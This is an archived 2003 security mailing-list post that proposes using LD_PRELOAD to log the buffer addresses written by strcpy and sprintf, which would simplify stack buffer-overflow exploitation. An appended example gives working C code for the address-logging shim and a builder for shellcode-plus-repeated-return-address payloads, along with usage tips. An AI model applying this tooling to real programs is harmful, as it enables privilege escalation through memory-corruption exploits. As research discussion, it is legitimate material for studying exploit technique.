Vulnerability Development mailing list archives
Automatic discovery of shellcode address
From: steve () uk intasys com
Date: Sat, 22 Mar 2003 00:18:34 +0000
Hi,
I've been playing around with LD_PRELOAD under Linux to modify
some functions commonly susceptible to buffer overflows (strcpy,
sprintf, etc.).
During the course of this work I had an interesting idea, and
I thought I'd post it here for comments.
There are many programs which are exploitable via user supplied
variables such as command line arguments and environment variables.
When these inputs are not adequately bounds tested they can be
used to subvert control flow.
A common method of exploitation is to run a program with a long
argument and see if EIP is overtaken, for example:
/usr/bin/foo `perl -e "print 'a' x 1000"`
If this is vulnerable you'd see something like "cannot access memory
at 0x41414141". This indicates that you've managed to overwrite
ESP with an address you control.
After that it's endgame - it's just a matter of working out where
your shellcode may be placed and the magic offsets to modify to
point to it.
Whilst this isn't terribly difficult it's a time consuming and
fragile process. (Maybe that's just me!)
It occurs to me that if you know where in memory the buffer
you're overflowing is (in the case of sprintf, strcpy, etc.), you
might be able to cheat.
Knowing the direction the stack goes, all you need to do
is overwrite the memory with:
# shellcode
# address of the start of the buffer x 1000
If the start of the buffer being copied to is known then stick the
shellcode there, and afterwards just append that address, so that
all the likely return pointers are left pointing at your shellcode
in a known location.
How do you get the address of the buffer in the first place?
Use LD_PRELOAD to modify 'strcpy' and 'sprintf' so they display the
address they're writing to. Simple.
(OK, LD_PRELOAD doesn't work for setuid binaries, but typically
copying the target to your machine will work, and you're safe as
the displayed addresses won't change.)
Does this sound reasonable, or am I imagining things?
I wrote a small text file on it, available below (note it's
still work in progress):
http://www.steve.org.uk/Hacks/preload.txt
Steve
---
www.steve.org.uk
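As an added example (not Steve's preload.txt and not any code from this page), here is what the two halves of the idea look like in C: a preloadable strcpy() shim that prints each destination address, and a builder for the "shellcode, then the buffer address repeated" payload. The shim covers strcpy only (sprintf is interposed the same way, forwarding to vsprintf) and does the copy by hand so it needs no dlsym(RTLD_NEXT). Assumptions, all mine: a 32-bit little-endian x86 target as in the post, a constructed buffer address of 0xbffff5a0 standing in for what the shim would have printed, three placeholder bytes standing in for real shellcode, and the helper names build_payload, payload_nul_index, shim_demo, build_sample and sample_byte. Two checks the post does not spell out are included: the shellcode is NOP-padded to a 4-byte boundary so the repeated address lands aligned with the saved return address slot (this assumes the buffer itself is 4-aligned), and the payload is scanned for NUL bytes, since strcpy() stops at the first one. One caveat on the "addresses won't change" point: the post predates stack ASLR, which current Linux kernels enable by default, so the address printed under LD_PRELOAD will differ between runs unless randomization is switched off (for example with `setarch $(uname -m) -R`).

```c
/*
 * preload_shim.c (added example): an LD_PRELOAD shim that reports the
 * destination of every strcpy() call, plus a builder for the
 * "shellcode + repeated buffer address" payload. 32-bit little-endian
 * x86 target assumed, as in the post.
 *
 *   gcc -shared -fPIC -o preload_shim.so preload_shim.c
 *   LD_PRELOAD=./preload_shim.so ./target "$(perl -e 'print "A" x 100')"
 *
 * The copy is done by hand so the shim needs no dlsym(RTLD_NEXT)/-ldl.
 * sprintf() can be interposed the same way by forwarding to vsprintf().
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static void *last_dest;   /* most recent destination seen (for checking) */

/* Interposed strcpy(): log where we are writing, then copy. */
char *strcpy(char *dest, const char *src)
{
    char *d = dest;
    last_dest = dest;
    fprintf(stderr, "[preload] strcpy -> dest=%p\n", (void *)dest);
    while ((*d++ = *src++) != '\0')
        ;
    return dest;
}

/* Call the shim through a volatile pointer so the compiler cannot fold
 * the call into a builtin; returns 1 if the logged address is our buffer. */
int shim_demo(void)
{
    char buf[16];
    char *(*volatile copy)(char *, const char *) = strcpy;
    copy(buf, "demo");
    return last_dest == (void *)buf && strcmp(buf, "demo") == 0;
}

/* Emit: shellcode, NOP-padded to a 4-byte boundary so the repeated
 * address stays aligned with the saved return address slot (assumes the
 * buffer is itself 4-aligned), then `count` little-endian copies of
 * buf_addr. Returns the payload length, or 0 if `cap` is too small. */
size_t build_payload(unsigned char *out, size_t cap,
                     const unsigned char *sc, size_t sclen,
                     uint32_t buf_addr, size_t count)
{
    size_t padded = (sclen + 3) & ~(size_t)3;
    size_t need = padded + 4 * count;
    if (cap < need)
        return 0;
    memcpy(out, sc, sclen);
    memset(out + sclen, 0x90, padded - sclen);   /* x86 NOP */
    for (size_t i = 0; i < count; i++) {
        unsigned char *p = out + padded + 4 * i;
        p[0] = (unsigned char)(buf_addr);
        p[1] = (unsigned char)(buf_addr >> 8);
        p[2] = (unsigned char)(buf_addr >> 16);
        p[3] = (unsigned char)(buf_addr >> 24);
    }
    return need;
}

/* strcpy() stops at the first NUL, so an address with a 0x00 byte (e.g.
 * 0x0804a000) truncates the payload. Index of the first NUL, or -1. */
long payload_nul_index(const unsigned char *p, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (p[i] == 0)
            return (long)i;
    return -1;
}

/* Constructed sample: 3 placeholder bytes stand in for shellcode; the
 * caller passes the buffer address the shim printed (assumed here). */
static unsigned char sample[64];

size_t build_sample(uint32_t buf_addr)
{
    static const unsigned char sc[] = { 0x31, 0xc0, 0xcc }; /* xor eax,eax; int3 */
    return build_payload(sample, sizeof sample, sc, sizeof sc, buf_addr, 3);
}
unsigned char sample_byte(size_t i) { return sample[i]; }
long sample_nul_index(size_t len) { return payload_nul_index(sample, len); }

int main(int argc, char **argv)
{
    char buf[64];
    const char *src = argc > 1 ? argv[1] : "demo";
    if (strlen(src) >= sizeof buf)
        return 1;
    strcpy(buf, src);                 /* the shim above reports &buf */
    size_t n = build_sample(0xbffff5a0u);   /* assumed address */
    printf("payload %zu bytes, first NUL at %ld\n", n, sample_nul_index(n));
    return 0;
}
```

Built as a shared object and preloaded, the shim prints one line for every strcpy() the target makes through the PLT, so read the line printed just before the crash, not the first one. Copies the compiler has inlined (strcpy of a constant string is commonly turned into a memcpy or a few stores) never reach libc and will not be reported, and glibc's own internal calls bypass the PLT as well. Feed the payload via an argument only if payload_nul_index() reports -1; a NUL anywhere in the address bytes means the copy ends early and the repeated addresses never reach the return slot.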
Current thread:
- Automatic discovery of shellcode address steve (Mar 23)
- RE: Automatic discovery of shellcode address Adam Gilmore (Mar 24)
- Re: Automatic discovery of shellcode address steve (Mar 24)
- Re: Automatic discovery of shellcode address Marco Ivaldi (Mar 24)
- Re: Automatic discovery of shellcode address steve (Mar 24)
- Re: Automatic discovery of shellcode address Joel Eriksson (Mar 28)
- RE: Automatic discovery of shellcode address Adam Gilmore (Mar 24)
